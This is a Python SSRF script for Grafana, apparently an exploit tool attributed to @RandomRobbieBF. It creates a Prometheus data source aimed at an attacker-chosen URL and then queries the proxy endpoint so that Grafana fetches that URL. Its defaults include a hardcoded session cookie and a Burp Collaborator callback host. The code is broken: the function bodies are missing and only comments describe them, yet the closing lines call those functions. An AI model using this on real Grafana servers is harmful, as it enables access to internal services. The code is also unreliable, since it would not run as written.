#!/usr/bin/env python # This script is used to test a Grafana instance for Server Side Request Forgery (SSRF) vulnerabilities through Prometheus. # This was originally authored by @RandomRobbieBF. # Note: The SSRF exploit attempted by this script does not follow redirects. # Importing the required libraries import requests import json import sys import argparse import re import os.path import json from requests.packages.urllib3.exceptions import InsecureRequestWarning # Disabling warnings from insecure requests for cleaner output. requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Creating a new session object that will persist across requests session = requests.Session() # Parsing arguments from the command line parser = argparse.ArgumentParser() # The user can optionally provide a session cookie. If not provided, a default value is used. parser.add_argument("-s", "--session", required=False ,default="9765ac114207245baf67dfd2a5e29f3a",help="Session Cookie Value") # The URL of the host to be checked for SSRF. It needs to have http or https. parser.add_argument("-u", "--url", required=False, default="http://8t2s8yx5gh5nw0z9bd3atkoprgx6lv.burpcollaborator.net",help="URL of host to check will need http or https") # The Grafana host URL. This argument is required. parser.add_argument("-H", "--host", default="http://kubernetes.docker.internal:5000",required=True, help="Host for Grafana") # Username for the Grafana instance. It's not required by default. parser.add_argument("-U", "--username", default="",required=False, help="Username for Grafana") # Password for the Grafana instance. It's not required by default. parser.add_argument("-P", "--password", default="",required=False, help="Password for Grafana") # If the user wants to use a proxy for debugging, they can provide it here. parser.add_argument("-p", "--proxy", default="",required=False, help="Proxy for debugging") # Parsing the arguments args = parser.parse_args() # Assigning parsed arguments to variables ssrf_url = args.url sessionid = args.session ghost = args.host username = args.username password = args.password # If a proxy is provided, it's set up as the environment variable for the current session if args.proxy: http_proxy = args.proxy os.environ['HTTP_PROXY'] = http_proxy os.environ['HTTPS_PROXY'] = http_proxy # Function to create a source in the Grafana instance. def create_source(sessionid, ssrf_url,ghost): # Preparing the request body and headers # The request is sent to /api/datasources endpoint of the Grafana instance # If the source with the same name already exists, the script will exit and prompt user to delete it manually. # If the source is successfully created, the function will return the ID of the new source. # Function to refresh the data source in Grafana. The request is sent to /api/datasources/{id} endpoint of the Grafana instance. # If the source is successfully refreshed, it prints "Refreshed Sources", else, it deletes the source and print the error. # Function to create a SSRF in the Grafana instance. # If the SSRF is successfully created, it prints "SSRF Source Updated", else, it deletes the source and print the error. # Function to check if the SSRF is working by sending a GET request to /api/datasources/proxy/{id}/ endpoint of the Grafana instance. # If the response status code is not 502, it prints the status code and response body, else, it deletes the source and print the error. # Function to delete a data source in the Grafana instance. The request is sent to /api/datasources/{id} endpoint of the Grafana instance. # If the data source is successfully deleted, it prints "Deleted Old SSRF Source", else, it exits the script and print the error. # Function to log in to the Grafana instance. It sends a POST request to /login endpoint of the Grafana instance. # If the login is successful, it returns the session cookie, else, it exits the script and print the error. # If the user has provided a username, it uses the login function to get the sessionid if username: sessionid = login(ghost,username,password) # If the user has provided a SSRF URL, it creates a source, refreshes the source, creates a SSRF, and checks the SSRF. if ssrf_url: i = create_source(sessionid,ssrf_url,ghost) id = str(i) refresh_source(ghost,sessionid,id) create_ssrf(sessionid,ssrf_url,ghost,id) check_ssrf(sessionid,id,ghost,ssrf_url)